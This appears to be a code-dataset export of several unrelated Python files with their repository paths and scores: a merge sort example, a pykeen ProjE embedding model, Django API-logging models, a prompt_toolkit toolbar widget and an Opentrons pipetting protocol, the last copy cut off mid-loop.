__all__ = ['VKChatBot', 'objects']
| 0.766075 | 0.057812 |
# Merge Sort function using loops
def merge_sort(array):
# Check if length of array is more than 1
if len(array) > 1:
# Getting middle element index
mid = len(array) // 2
left_half = array[:mid]
right_half = array[mid:]
# Merge sorting left half
left = merge_sort(left_half)
# Merge sorting right half
right = merge_sort(right_half)
# Merge the two halves & return it
return mergeUsingLoops(left, right)
else:
# Return array with single element
return array
# Merge function using loops
def mergeUsingLoops(left, right):
# If left part is empty, return right part
if not left:
return right
# If right part is empty, return left part
if not right:
return left
result = []
i, j = 0, 0
# Comparing values of both parts
while(len(result) < len(left) + len(right)):
if left[i] < right[j]:
result.append(left[i])
i += 1
else:
result.append(right[j])
j += 1
# Copying the remaining elements of one part
if i == len(left) or j == len(right):
result.extend(left[i:] or right[j:])
break
return result
# Merge Sort using second function
def mergesort(array):
# Check if length of array is more than 1
if len(array) > 1:
# Getting middle element index
mid = len(array) // 2
left_half = array[:mid]
right_half = array[mid:]
# Merge sorting left half
left = merge_sort(left_half)
# Merge sorting right half
right = merge_sort(right_half)
# Merge the two halves & return it
return merge(left, right)
else:
# Return array with single element
return array
# Merge function
def merge(left, right):
# If left part is empty, return right part
if not left:
return right
# If right part is empty, return left part
if not right:
return left
# Compare first element and merge the remaining elements of the part (with smaller element) with other part
if left[0] < right[0]:
return [left[0]] + merge(left[1:], right)
return [right[0]] + merge(left, right[1:])
# Example
array = [54, 26, 93, 17, 77, 31, 44, 55, 20]
print("Merge Sort for ", array)
print("Sorted array using loops: ", merge_sort(array))
print("Sorted array using another function: ", mergesort(array))
|
Sorting Algorithms/Merge Sort Algorithm/Python/MergeSort.py
|
# Merge Sort function using loops
def merge_sort(array):
# Check if length of array is more than 1
if len(array) > 1:
# Getting middle element index
mid = len(array) // 2
left_half = array[:mid]
right_half = array[mid:]
# Merge sorting left half
left = merge_sort(left_half)
# Merge sorting right half
right = merge_sort(right_half)
# Merge the two halves & return it
return mergeUsingLoops(left, right)
else:
# Return array with single element
return array
# Merge function using loops
def mergeUsingLoops(left, right):
# If left part is empty, return right part
if not left:
return right
# If right part is empty, return left part
if not right:
return left
result = []
i, j = 0, 0
# Comparing values of both parts
while(len(result) < len(left) + len(right)):
if left[i] < right[j]:
result.append(left[i])
i += 1
else:
result.append(right[j])
j += 1
# Copying the remaining elements of one part
if i == len(left) or j == len(right):
result.extend(left[i:] or right[j:])
break
return result
# Merge Sort using second function
def mergesort(array):
# Check if length of array is more than 1
if len(array) > 1:
# Getting middle element index
mid = len(array) // 2
left_half = array[:mid]
right_half = array[mid:]
# Merge sorting left half
left = merge_sort(left_half)
# Merge sorting right half
right = merge_sort(right_half)
# Merge the two halves & return it
return merge(left, right)
else:
# Return array with single element
return array
# Merge function
def merge(left, right):
# If left part is empty, return right part
if not left:
return right
# If right part is empty, return left part
if not right:
return left
# Compare first element and merge the remaining elements of the part (with smaller element) with other part
if left[0] < right[0]:
return [left[0]] + merge(left[1:], right)
return [right[0]] + merge(left, right[1:])
# Example
array = [54, 26, 93, 17, 77, 31, 44, 55, 20]
print("Merge Sort for ", array)
print("Sorted array using loops: ", merge_sort(array))
print("Sorted array using another function: ", mergesort(array))
| 0.605799 | 0.803097 |
from typing import Optional
import numpy
import torch
import torch.autograd
from torch import nn
from ..base import EntityRelationEmbeddingModel
from ...losses import Loss
from ...nn.init import xavier_uniform_
from ...regularizers import Regularizer
from ...triples import TriplesFactory
from ...typing import DeviceHint
__all__ = [
'ProjE',
]
class ProjE(EntityRelationEmbeddingModel):
r"""An implementation of ProjE from [shi2017]_.
ProjE is a neural network-based approach with a *combination* and a *projection* layer. The interaction model
first combines $h$ and $r$ by following combination operator:
.. math::
\textbf{h} \otimes \textbf{r} = \textbf{D}_e \textbf{h} + \textbf{D}_r \textbf{r} + \textbf{b}_c
where $\textbf{D}_e, \textbf{D}_r \in \mathbb{R}^{k \times k}$ are diagonal matrices which are used as shared
parameters among all entities and relations, and $\textbf{b}_c \in \mathbb{R}^{k}$ represents the candidate bias
vector shared across all entities. Next, the score for the triple $(h,r,t) \in \mathbb{K}$ is computed:
.. math::
f(h, r, t) = g(\textbf{t} \ z(\textbf{h} \otimes \textbf{r}) + \textbf{b}_p)
where $g$ and $z$ are activation functions, and $\textbf{b}_p$ represents the shared projection bias vector.
.. seealso::
- Official Implementation: https://github.com/nddsg/ProjE
"""
#: The default strategy for optimizing the model's hyper-parameters
hpo_default = dict(
embedding_dim=dict(type=int, low=50, high=350, q=25),
)
#: The default loss function class
loss_default = nn.BCEWithLogitsLoss
#: The default parameters for the default loss function class
loss_default_kwargs = dict(reduction='mean')
def __init__(
self,
triples_factory: TriplesFactory,
embedding_dim: int = 50,
automatic_memory_optimization: Optional[bool] = None,
loss: Optional[Loss] = None,
preferred_device: DeviceHint = None,
random_seed: Optional[int] = None,
inner_non_linearity: Optional[nn.Module] = None,
regularizer: Optional[Regularizer] = None,
) -> None:
super().__init__(
triples_factory=triples_factory,
embedding_dim=embedding_dim,
automatic_memory_optimization=automatic_memory_optimization,
loss=loss,
preferred_device=preferred_device,
random_seed=random_seed,
regularizer=regularizer,
entity_initializer=xavier_uniform_,
relation_initializer=xavier_uniform_,
)
# Global entity projection
self.d_e = nn.Parameter(torch.empty(self.embedding_dim, device=self.device), requires_grad=True)
# Global relation projection
self.d_r = nn.Parameter(torch.empty(self.embedding_dim, device=self.device), requires_grad=True)
# Global combination bias
self.b_c = nn.Parameter(torch.empty(self.embedding_dim, device=self.device), requires_grad=True)
# Global combination bias
self.b_p = nn.Parameter(torch.empty(1, device=self.device), requires_grad=True)
if inner_non_linearity is None:
inner_non_linearity = nn.Tanh()
self.inner_non_linearity = inner_non_linearity
def _reset_parameters_(self): # noqa: D102
super()._reset_parameters_()
bound = numpy.sqrt(6) / self.embedding_dim
nn.init.uniform_(self.d_e, a=-bound, b=bound)
nn.init.uniform_(self.d_r, a=-bound, b=bound)
nn.init.uniform_(self.b_c, a=-bound, b=bound)
nn.init.uniform_(self.b_p, a=-bound, b=bound)
def score_hrt(self, hrt_batch: torch.LongTensor) -> torch.FloatTensor: # noqa: D102
# Get embeddings
h = self.entity_embeddings(indices=hrt_batch[:, 0])
r = self.relation_embeddings(indices=hrt_batch[:, 1])
t = self.entity_embeddings(indices=hrt_batch[:, 2])
# Compute score
hidden = self.inner_non_linearity(self.d_e[None, :] * h + self.d_r[None, :] * r + self.b_c[None, :])
scores = torch.sum(hidden * t, dim=-1, keepdim=True) + self.b_p
return scores
def score_t(self, hr_batch: torch.LongTensor) -> torch.FloatTensor: # noqa: D102
# Get embeddings
h = self.entity_embeddings(indices=hr_batch[:, 0])
r = self.relation_embeddings(indices=hr_batch[:, 1])
t = self.entity_embeddings(indices=None)
# Rank against all entities
hidden = self.inner_non_linearity(self.d_e[None, :] * h + self.d_r[None, :] * r + self.b_c[None, :])
scores = torch.sum(hidden[:, None, :] * t[None, :, :], dim=-1) + self.b_p
return scores
def score_h(self, rt_batch: torch.LongTensor) -> torch.FloatTensor: # noqa: D102
# Get embeddings
h = self.entity_embeddings(indices=None)
r = self.relation_embeddings(indices=rt_batch[:, 0])
t = self.entity_embeddings(indices=rt_batch[:, 1])
# Rank against all entities
hidden = self.inner_non_linearity(
self.d_e[None, None, :] * h[None, :, :]
+ (self.d_r[None, None, :] * r[:, None, :] + self.b_c[None, None, :]),
)
scores = torch.sum(hidden * t[:, None, :], dim=-1) + self.b_p
return scores
|
src/pykeen/models/unimodal/proj_e.py
|
from typing import Optional
import numpy
import torch
import torch.autograd
from torch import nn
from ..base import EntityRelationEmbeddingModel
from ...losses import Loss
from ...nn.init import xavier_uniform_
from ...regularizers import Regularizer
from ...triples import TriplesFactory
from ...typing import DeviceHint
__all__ = [
'ProjE',
]
class ProjE(EntityRelationEmbeddingModel):
r"""An implementation of ProjE from [shi2017]_.
ProjE is a neural network-based approach with a *combination* and a *projection* layer. The interaction model
first combines $h$ and $r$ by following combination operator:
.. math::
\textbf{h} \otimes \textbf{r} = \textbf{D}_e \textbf{h} + \textbf{D}_r \textbf{r} + \textbf{b}_c
where $\textbf{D}_e, \textbf{D}_r \in \mathbb{R}^{k \times k}$ are diagonal matrices which are used as shared
parameters among all entities and relations, and $\textbf{b}_c \in \mathbb{R}^{k}$ represents the candidate bias
vector shared across all entities. Next, the score for the triple $(h,r,t) \in \mathbb{K}$ is computed:
.. math::
f(h, r, t) = g(\textbf{t} \ z(\textbf{h} \otimes \textbf{r}) + \textbf{b}_p)
where $g$ and $z$ are activation functions, and $\textbf{b}_p$ represents the shared projection bias vector.
.. seealso::
- Official Implementation: https://github.com/nddsg/ProjE
"""
#: The default strategy for optimizing the model's hyper-parameters
hpo_default = dict(
embedding_dim=dict(type=int, low=50, high=350, q=25),
)
#: The default loss function class
loss_default = nn.BCEWithLogitsLoss
#: The default parameters for the default loss function class
loss_default_kwargs = dict(reduction='mean')
def __init__(
self,
triples_factory: TriplesFactory,
embedding_dim: int = 50,
automatic_memory_optimization: Optional[bool] = None,
loss: Optional[Loss] = None,
preferred_device: DeviceHint = None,
random_seed: Optional[int] = None,
inner_non_linearity: Optional[nn.Module] = None,
regularizer: Optional[Regularizer] = None,
) -> None:
super().__init__(
triples_factory=triples_factory,
embedding_dim=embedding_dim,
automatic_memory_optimization=automatic_memory_optimization,
loss=loss,
preferred_device=preferred_device,
random_seed=random_seed,
regularizer=regularizer,
entity_initializer=xavier_uniform_,
relation_initializer=xavier_uniform_,
)
# Global entity projection
self.d_e = nn.Parameter(torch.empty(self.embedding_dim, device=self.device), requires_grad=True)
# Global relation projection
self.d_r = nn.Parameter(torch.empty(self.embedding_dim, device=self.device), requires_grad=True)
# Global combination bias
self.b_c = nn.Parameter(torch.empty(self.embedding_dim, device=self.device), requires_grad=True)
# Global combination bias
self.b_p = nn.Parameter(torch.empty(1, device=self.device), requires_grad=True)
if inner_non_linearity is None:
inner_non_linearity = nn.Tanh()
self.inner_non_linearity = inner_non_linearity
def _reset_parameters_(self): # noqa: D102
super()._reset_parameters_()
bound = numpy.sqrt(6) / self.embedding_dim
nn.init.uniform_(self.d_e, a=-bound, b=bound)
nn.init.uniform_(self.d_r, a=-bound, b=bound)
nn.init.uniform_(self.b_c, a=-bound, b=bound)
nn.init.uniform_(self.b_p, a=-bound, b=bound)
def score_hrt(self, hrt_batch: torch.LongTensor) -> torch.FloatTensor: # noqa: D102
# Get embeddings
h = self.entity_embeddings(indices=hrt_batch[:, 0])
r = self.relation_embeddings(indices=hrt_batch[:, 1])
t = self.entity_embeddings(indices=hrt_batch[:, 2])
# Compute score
hidden = self.inner_non_linearity(self.d_e[None, :] * h + self.d_r[None, :] * r + self.b_c[None, :])
scores = torch.sum(hidden * t, dim=-1, keepdim=True) + self.b_p
return scores
def score_t(self, hr_batch: torch.LongTensor) -> torch.FloatTensor: # noqa: D102
# Get embeddings
h = self.entity_embeddings(indices=hr_batch[:, 0])
r = self.relation_embeddings(indices=hr_batch[:, 1])
t = self.entity_embeddings(indices=None)
# Rank against all entities
hidden = self.inner_non_linearity(self.d_e[None, :] * h + self.d_r[None, :] * r + self.b_c[None, :])
scores = torch.sum(hidden[:, None, :] * t[None, :, :], dim=-1) + self.b_p
return scores
def score_h(self, rt_batch: torch.LongTensor) -> torch.FloatTensor: # noqa: D102
# Get embeddings
h = self.entity_embeddings(indices=None)
r = self.relation_embeddings(indices=rt_batch[:, 0])
t = self.entity_embeddings(indices=rt_batch[:, 1])
# Rank against all entities
hidden = self.inner_non_linearity(
self.d_e[None, None, :] * h[None, :, :]
+ (self.d_r[None, None, :] * r[:, None, :] + self.b_c[None, None, :]),
)
scores = torch.sum(hidden * t[:, None, :], dim=-1) + self.b_p
return scores
| 0.971913 | 0.840652 |
import logging
from django.conf import settings
from django.db import models
# Instantiate logger.
logger = logging.getLogger(__name__)
class ApiKey(models.Model):
"""
Keys used for authenticating API requests.
"""
user = models.ForeignKey(settings.AUTH_USER_MODEL)
key = models.CharField(max_length=200, unique=True, db_index=True)
description = models.CharField(max_length=200, blank=True)
created_at = models.DateTimeField(auto_now_add=True)
last_used = models.DateTimeField(blank=True, null=True)
active = models.BooleanField()
def __unicode__(self):
"""
String representation of the instance.
"""
return str(self.user)
class ApiCall(models.Model):
"""
Log details regarding API call.
"""
date = models.DateTimeField()
method = models.CharField(max_length=10)
endpoint = models.CharField(max_length=100)
source_ip = models.CharField(max_length=50)
execution_start = models.DateTimeField()
execution_end = models.DateTimeField()
status = models.IntegerField()
user_agent = models.CharField(max_length=200)
authentication_class = models.CharField(max_length=50, blank=True)
authentication_user = models.ForeignKey(settings.AUTH_USER_MODEL, blank=True, null=True)
authentication_token = models.CharField(max_length=200, blank=True)
request_get_params = models.TextField(blank=True)
request_data = models.TextField(blank=True)
response_data = models.TextField(blank=True)
def __unicode__(self):
"""
String representation of the instance.
"""
return self.method
def execution_time(self):
"""
Returns the execution time (in seconds) for the given API call.
"""
return round((self.execution_end - self.execution_start).microseconds / float(1000000), 3)
@staticmethod
def new(date, method, endpoint, source_ip, execution_start, execution_end, status, user_agent,
authentication=None, request_get_params=None, request_data=None, response_data=None):
"""
Logs an API call.
"""
api_call = ApiCall(date=date,
method=method,
endpoint=endpoint,
source_ip=source_ip,
execution_start=execution_start,
execution_end=execution_end,
status=status,
user_agent=user_agent)
# If call was authenticated.
if authentication:
# Fetch details.
authentication_user = authentication['user']
authentication_class = authentication['class']
authentication_token = authentication['token']
# User.
api_call.authentication_user = authentication_user
# These details may not exist, but cannot be 'null' in the database, thus, replace by 'blank' if necessary.
if not authentication_class:
api_call.authentication_class = ''
else:
api_call.authentication_class = authentication_class
if not authentication_token:
api_call.authentication_token = ''
else:
api_call.authentication_token = authentication_token
# If request/response data provided.
if request_get_params:
api_call.request_get_params = request_get_params
if request_data:
api_call.request_data = request_data
if response_data:
api_call.response_data = response_data
# Save and return.
api_call.save()
return api_call
|
yapi/models.py
|
import logging
from django.conf import settings
from django.db import models
# Instantiate logger.
logger = logging.getLogger(__name__)
class ApiKey(models.Model):
"""
Keys used for authenticating API requests.
"""
user = models.ForeignKey(settings.AUTH_USER_MODEL)
key = models.CharField(max_length=200, unique=True, db_index=True)
description = models.CharField(max_length=200, blank=True)
created_at = models.DateTimeField(auto_now_add=True)
last_used = models.DateTimeField(blank=True, null=True)
active = models.BooleanField()
def __unicode__(self):
"""
String representation of the instance.
"""
return str(self.user)
class ApiCall(models.Model):
"""
Log details regarding API call.
"""
date = models.DateTimeField()
method = models.CharField(max_length=10)
endpoint = models.CharField(max_length=100)
source_ip = models.CharField(max_length=50)
execution_start = models.DateTimeField()
execution_end = models.DateTimeField()
status = models.IntegerField()
user_agent = models.CharField(max_length=200)
authentication_class = models.CharField(max_length=50, blank=True)
authentication_user = models.ForeignKey(settings.AUTH_USER_MODEL, blank=True, null=True)
authentication_token = models.CharField(max_length=200, blank=True)
request_get_params = models.TextField(blank=True)
request_data = models.TextField(blank=True)
response_data = models.TextField(blank=True)
def __unicode__(self):
"""
String representation of the instance.
"""
return self.method
def execution_time(self):
"""
Returns the execution time (in seconds) for the given API call.
"""
return round((self.execution_end - self.execution_start).microseconds / float(1000000), 3)
@staticmethod
def new(date, method, endpoint, source_ip, execution_start, execution_end, status, user_agent,
authentication=None, request_get_params=None, request_data=None, response_data=None):
"""
Logs an API call.
"""
api_call = ApiCall(date=date,
method=method,
endpoint=endpoint,
source_ip=source_ip,
execution_start=execution_start,
execution_end=execution_end,
status=status,
user_agent=user_agent)
# If call was authenticated.
if authentication:
# Fetch details.
authentication_user = authentication['user']
authentication_class = authentication['class']
authentication_token = authentication['token']
# User.
api_call.authentication_user = authentication_user
# These details may not exist, but cannot be 'null' in the database, thus, replace by 'blank' if necessary.
if not authentication_class:
api_call.authentication_class = ''
else:
api_call.authentication_class = authentication_class
if not authentication_token:
api_call.authentication_token = ''
else:
api_call.authentication_token = authentication_token
# If request/response data provided.
if request_get_params:
api_call.request_get_params = request_get_params
if request_data:
api_call.request_data = request_data
if response_data:
api_call.response_data = response_data
# Save and return.
api_call.save()
return api_call
| 0.679285 | 0.097907 |
"""Window pane toolbar base class."""
from typing import Any, Callable, List, Optional
import functools
from prompt_toolkit.filters import Condition, has_focus
from prompt_toolkit.layout import (
ConditionalContainer,
FormattedTextControl,
VSplit,
Window,
WindowAlign,
)
import pw_console.style
from pw_console.widgets import (
ToolbarButton,
to_checkbox_with_keybind_indicator,
to_keybind_indicator,
)
import pw_console.widgets.mouse_handlers
class WindowPaneToolbar:
"""One line toolbar for display at the bottom of of a window pane."""
# pylint: disable=too-many-instance-attributes
TOOLBAR_HEIGHT = 1
def get_left_text_tokens(self):
"""Return toolbar indicator and title."""
title = ' {} '.format(self.title)
return pw_console.style.get_pane_indicator(self.focus_check_container,
title,
self.focus_mouse_handler)
def get_center_text_tokens(self):
"""Return formatted text tokens for display in the center part of the
toolbar."""
button_style = pw_console.style.get_button_style(
self.focus_check_container)
# FormattedTextTuple contents: (Style, Text, Mouse handler)
separator_text = [('', ' ')
] # 2 spaces of separaton between keybinds.
if self.focus_mouse_handler:
separator_text = [('', ' ', self.focus_mouse_handler)]
fragments = []
fragments.extend(separator_text)
for button in self.buttons:
on_click_handler = None
if button.mouse_handler:
on_click_handler = functools.partial(
pw_console.widgets.mouse_handlers.on_click,
button.mouse_handler)
if button.is_checkbox:
fragments.extend(
to_checkbox_with_keybind_indicator(
button.checked(),
button.key,
button.description,
on_click_handler,
base_style=button_style))
else:
fragments.extend(
to_keybind_indicator(button.key,
button.description,
on_click_handler,
base_style=button_style))
fragments.extend(separator_text)
# Remaining whitespace should focus on click.
fragments.extend(separator_text)
return fragments
def get_right_text_tokens(self):
"""Return formatted text tokens for display."""
fragments = []
if not has_focus(self.focus_check_container.__pt_container__())():
fragments.append((
'class:toolbar-button-inactive class:toolbar-button-decoration',
' ', self.focus_mouse_handler))
fragments.append(('class:toolbar-button-inactive class:keyhelp',
'click to focus', self.focus_mouse_handler))
fragments.append((
'class:toolbar-button-inactive class:toolbar-button-decoration',
' ', self.focus_mouse_handler))
fragments.append(
('', ' {} '.format(self.subtitle()), self.focus_mouse_handler))
return fragments
def add_button(self, button: ToolbarButton):
self.buttons.append(button)
def __init__(
self,
parent_window_pane: Optional[Any] = None,
title: Optional[str] = None,
subtitle: Optional[Callable[[], str]] = None,
focus_check_container: Optional[Any] = None,
focus_action_callable: Optional[Callable] = None,
center_section_align: WindowAlign = WindowAlign.LEFT,
):
self.parent_window_pane = parent_window_pane
self.title = title
self.subtitle = subtitle
# Assume check this container for focus
self.focus_check_container = self
self.focus_action_callable = None
# Set parent_window_pane related options
if self.parent_window_pane:
self.title = self.parent_window_pane.pane_title()
self.subtitle = self.parent_window_pane.pane_subtitle
self.focus_check_container = self.parent_window_pane
self.focus_action_callable = self.parent_window_pane.focus_self
# Set title overrides
if self.subtitle is None:
def empty_subtitle() -> str:
return ''
self.subtitle = empty_subtitle
if focus_check_container:
self.focus_check_container = focus_check_container
if focus_action_callable:
self.focus_action_callable = focus_action_callable
self.focus_mouse_handler = None
if self.focus_action_callable:
self.focus_mouse_handler = functools.partial(
pw_console.widgets.mouse_handlers.on_click,
self.focus_action_callable)
self.buttons: List[ToolbarButton] = []
self.show_toolbar = True
self.left_section_window = Window(
content=FormattedTextControl(self.get_left_text_tokens),
align=WindowAlign.LEFT,
dont_extend_width=True,
)
self.center_section_window = Window(
content=FormattedTextControl(self.get_center_text_tokens),
align=center_section_align,
dont_extend_width=False,
)
self.right_section_window = Window(
content=FormattedTextControl(self.get_right_text_tokens),
# Right side text should appear at the far right of the toolbar
align=WindowAlign.RIGHT,
dont_extend_width=True,
)
get_toolbar_style = functools.partial(
pw_console.style.get_toolbar_style, self.focus_check_container)
self.toolbar_vsplit = VSplit(
[
self.left_section_window,
self.center_section_window,
self.right_section_window,
],
height=WindowPaneToolbar.TOOLBAR_HEIGHT,
style=get_toolbar_style,
)
self.container = self._create_toolbar_container(self.toolbar_vsplit)
def _create_toolbar_container(self, content):
return ConditionalContainer(
content, filter=Condition(lambda: self.show_toolbar))
def __pt_container__(self):
"""Return the prompt_toolkit root container for this log pane.
This allows self to be used wherever prompt_toolkit expects a container
object."""
return self.container # pylint: disable=no-member
|
pw_console/py/pw_console/widgets/window_pane_toolbar.py
|
"""Window pane toolbar base class."""
from typing import Any, Callable, List, Optional
import functools
from prompt_toolkit.filters import Condition, has_focus
from prompt_toolkit.layout import (
ConditionalContainer,
FormattedTextControl,
VSplit,
Window,
WindowAlign,
)
import pw_console.style
from pw_console.widgets import (
ToolbarButton,
to_checkbox_with_keybind_indicator,
to_keybind_indicator,
)
import pw_console.widgets.mouse_handlers
class WindowPaneToolbar:
"""One line toolbar for display at the bottom of of a window pane."""
# pylint: disable=too-many-instance-attributes
TOOLBAR_HEIGHT = 1
def get_left_text_tokens(self):
"""Return toolbar indicator and title."""
title = ' {} '.format(self.title)
return pw_console.style.get_pane_indicator(self.focus_check_container,
title,
self.focus_mouse_handler)
def get_center_text_tokens(self):
"""Return formatted text tokens for display in the center part of the
toolbar."""
button_style = pw_console.style.get_button_style(
self.focus_check_container)
# FormattedTextTuple contents: (Style, Text, Mouse handler)
separator_text = [('', ' ')
] # 2 spaces of separaton between keybinds.
if self.focus_mouse_handler:
separator_text = [('', ' ', self.focus_mouse_handler)]
fragments = []
fragments.extend(separator_text)
for button in self.buttons:
on_click_handler = None
if button.mouse_handler:
on_click_handler = functools.partial(
pw_console.widgets.mouse_handlers.on_click,
button.mouse_handler)
if button.is_checkbox:
fragments.extend(
to_checkbox_with_keybind_indicator(
button.checked(),
button.key,
button.description,
on_click_handler,
base_style=button_style))
else:
fragments.extend(
to_keybind_indicator(button.key,
button.description,
on_click_handler,
base_style=button_style))
fragments.extend(separator_text)
# Remaining whitespace should focus on click.
fragments.extend(separator_text)
return fragments
def get_right_text_tokens(self):
"""Return formatted text tokens for display."""
fragments = []
if not has_focus(self.focus_check_container.__pt_container__())():
fragments.append((
'class:toolbar-button-inactive class:toolbar-button-decoration',
' ', self.focus_mouse_handler))
fragments.append(('class:toolbar-button-inactive class:keyhelp',
'click to focus', self.focus_mouse_handler))
fragments.append((
'class:toolbar-button-inactive class:toolbar-button-decoration',
' ', self.focus_mouse_handler))
fragments.append(
('', ' {} '.format(self.subtitle()), self.focus_mouse_handler))
return fragments
def add_button(self, button: ToolbarButton):
self.buttons.append(button)
def __init__(
self,
parent_window_pane: Optional[Any] = None,
title: Optional[str] = None,
subtitle: Optional[Callable[[], str]] = None,
focus_check_container: Optional[Any] = None,
focus_action_callable: Optional[Callable] = None,
center_section_align: WindowAlign = WindowAlign.LEFT,
):
self.parent_window_pane = parent_window_pane
self.title = title
self.subtitle = subtitle
# Assume check this container for focus
self.focus_check_container = self
self.focus_action_callable = None
# Set parent_window_pane related options
if self.parent_window_pane:
self.title = self.parent_window_pane.pane_title()
self.subtitle = self.parent_window_pane.pane_subtitle
self.focus_check_container = self.parent_window_pane
self.focus_action_callable = self.parent_window_pane.focus_self
# Set title overrides
if self.subtitle is None:
def empty_subtitle() -> str:
return ''
self.subtitle = empty_subtitle
if focus_check_container:
self.focus_check_container = focus_check_container
if focus_action_callable:
self.focus_action_callable = focus_action_callable
self.focus_mouse_handler = None
if self.focus_action_callable:
self.focus_mouse_handler = functools.partial(
pw_console.widgets.mouse_handlers.on_click,
self.focus_action_callable)
self.buttons: List[ToolbarButton] = []
self.show_toolbar = True
self.left_section_window = Window(
content=FormattedTextControl(self.get_left_text_tokens),
align=WindowAlign.LEFT,
dont_extend_width=True,
)
self.center_section_window = Window(
content=FormattedTextControl(self.get_center_text_tokens),
align=center_section_align,
dont_extend_width=False,
)
self.right_section_window = Window(
content=FormattedTextControl(self.get_right_text_tokens),
# Right side text should appear at the far right of the toolbar
align=WindowAlign.RIGHT,
dont_extend_width=True,
)
get_toolbar_style = functools.partial(
pw_console.style.get_toolbar_style, self.focus_check_container)
self.toolbar_vsplit = VSplit(
[
self.left_section_window,
self.center_section_window,
self.right_section_window,
],
height=WindowPaneToolbar.TOOLBAR_HEIGHT,
style=get_toolbar_style,
)
self.container = self._create_toolbar_container(self.toolbar_vsplit)
def _create_toolbar_container(self, content):
return ConditionalContainer(
content, filter=Condition(lambda: self.show_toolbar))
def __pt_container__(self):
"""Return the prompt_toolkit root container for this log pane.
This allows self to be used wherever prompt_toolkit expects a container
object."""
return self.container # pylint: disable=no-member
| 0.867162 | 0.068382 |
from opentrons import protocol_api
import pandas as pd
import decimal, math
#Not yet implement labware compatibility and constrains
metadata = {'apiLevel': '2.8'}
def run(protocol: protocol_api.ProtocolContext):
pipette_name = 'p300_single'
#file path
df = pd.read_csv(r'test/generated_test_files/random_plate.tsv', sep='\t')
#volume each well
maxVol = 200
tuberack_1 = protocol.load_labware('opentrons_6_tuberack_falcon_50ml_conical',1)
tuberack_2 = protocol.load_labware('opentrons_6_tuberack_falcon_50ml_conical',2)
tiprack_1 = protocol.load_labware('opentrons_96_tiprack_300ul',3)
plate = protocol.load_labware('corning_96_wellplate_360ul_flat',4)
pipette = protocol.load_instrument(pipette_name,'right', tip_racks=[tiprack_1])
#[0.0 for df1.loc[i] in [1..12]
#calculate the concentration (total should = 1)
sources = list(df)
sources.remove("wells")
tubes = len(df.columns) - 1
df['sumVol'] = df[sources].sum(axis=1)
#create the output file
df1 = pd.DataFrame(columns = [])
df1.index.name = 'wells'
#initialize the sources column
for i in range (12):
df1['source ' + str(i+1)] = 0
#initialize the values of each cell
for i in range (96):
df1.loc[i] = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
#make index start at 1
df1.index=df1.index+1
df1.sort_index()
#determine the amount to aspirate to multi-dispense
if pipette_name == 'p20_single':
aspireVol = 20
minVol = 2
elif pipette_name == 'p300_single':
aspireVol = 300
minVol = 30
else:
aspireVol = 1000
minVol = 100
curVol = 0 #current volume in tip
#check invalid concentration (total not = 1)
#create an ignore array that includes wells with no solution
#determine validWells to constrain the range of inner for loop
ignore=[]
validWells = 0
for i in df.index:
sum = df['sumVol'][i]
if int(round(sum,3)) != 1 and sum != 0:
print("Invalid vol at well ")
print (i+1)
ignore.append(i)
elif int(round(sum,3)) == 1:
validWells = i+1
elif sum == 0:
ignore.append(i)
#set tubeRack
#start transfering
curRack = tuberack_1
curTube = -1
#nested loops to transfer from 1 tube to many wells
#outer loop: accessing tube
for i in range(tubes):
#switch from tuberack_1 to tuberack_2 as needed
if i+1 == math.ceil(tubes/2+1):
curRack = tuberack_2
curTube = -1
curTube += 1
pipette.pick_up_tip()
#inner loop: accessing the wells
for j in range(validWells):
volTip = (df.iat[j,i+1])*maxVol
#aspire full tip
if curVol < volTip or curVol <= minVol:
pipette.aspirate(float(aspireVol-curVol), curRack.wells()[curTube])
curVol = aspireVol
if j not in ignore:
if volTip != 0:
pipette.dispense(float(volTip), plate.wells()[j])
curVol -= volTip
if i+1 < 7:
df1.at[j+1,'source '+str(curTube+1)] = float(volTip)
else:
df1.at[j+1,'source '+str(curTube+7)] = float(volTip)
if j == validWells - 1:
#pipette.blow_out(curRack.wells()[curTube])
curVol = 0
pipette.drop_tip()
df1.to_csv("output.tsv", sep="\t")
|
distribute.py
|
from opentrons import protocol_api
import pandas as pd
import decimal, math
#Not yet implement labware compatibility and constrains
metadata = {'apiLevel': '2.8'}
def run(protocol: protocol_api.ProtocolContext):
pipette_name = 'p300_single'
#file path
df = pd.read_csv(r'test/generated_test_files/random_plate.tsv', sep='\t')
#volume each well
maxVol = 200
tuberack_1 = protocol.load_labware('opentrons_6_tuberack_falcon_50ml_conical',1)
tuberack_2 = protocol.load_labware('opentrons_6_tuberack_falcon_50ml_conical',2)
tiprack_1 = protocol.load_labware('opentrons_96_tiprack_300ul',3)
plate = protocol.load_labware('corning_96_wellplate_360ul_flat',4)
pipette = protocol.load_instrument(pipette_name,'right', tip_racks=[tiprack_1])
#[0.0 for df1.loc[i] in [1..12]
#calculate the concentration (total should = 1)
sources = list(df)
sources.remove("wells")
tubes = len(df.columns) - 1
df['sumVol'] = df[sources].sum(axis=1)
#create the output file
df1 = pd.DataFrame(columns = [])
df1.index.name = 'wells'
#initialize the sources column
for i in range (12):
df1['source ' + str(i+1)] = 0
#initialize the values of each cell
for i in range (96):
df1.loc[i] = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
#make index start at 1
df1.index=df1.index+1
df1.sort_index()
#determine the amount to aspirate to multi-dispense
if pipette_name == 'p20_single':
aspireVol = 20
minVol = 2
elif pipette_name == 'p300_single':
aspireVol = 300
minVol = 30
else:
aspireVol = 1000
minVol = 100
curVol = 0 #current volume in tip
#check invalid concentration (total not = 1)
#create an ignore array that includes wells with no solution
#determine validWells to constrain the range of inner for loop
ignore=[]
validWells = 0
for i in df.index:
sum = df['sumVol'][i]
if int(round(sum,3)) != 1 and sum != 0:
print("Invalid vol at well ")
print (i+1)
ignore.append(i)
elif int(round(sum,3)) == 1:
validWells = i+1
elif sum == 0:
ignore.append(i)
#set tubeRack
#start transfering
curRack = tuberack_1
curTube = -1
#nested loops to transfer from 1 tube to many wells
#outer loop: accessing tube
for i in range(tubes):
#switch from tuberack_1 to tuberack_2 as needed
if i+1 == math.ceil(tubes/2+1):
curRack = tuberack_2
curTube = -1
curTube += 1
pipette.pick_up_tip()
#inner loop: accessing the wells
for j in range(validWells):
volTip = (df.iat[j,i+1])*maxVol
#aspire full tip
if curVol < volTip or curVol <= minVol:
pipette.aspirate(float(aspireVol-curVol), curRack.wells()[curTube])
curVol = aspireVol
if j not in ignore:
if volTip != 0:
pipette.dispense(float(volTip), plate.wells()[j])
curVol -= volTip
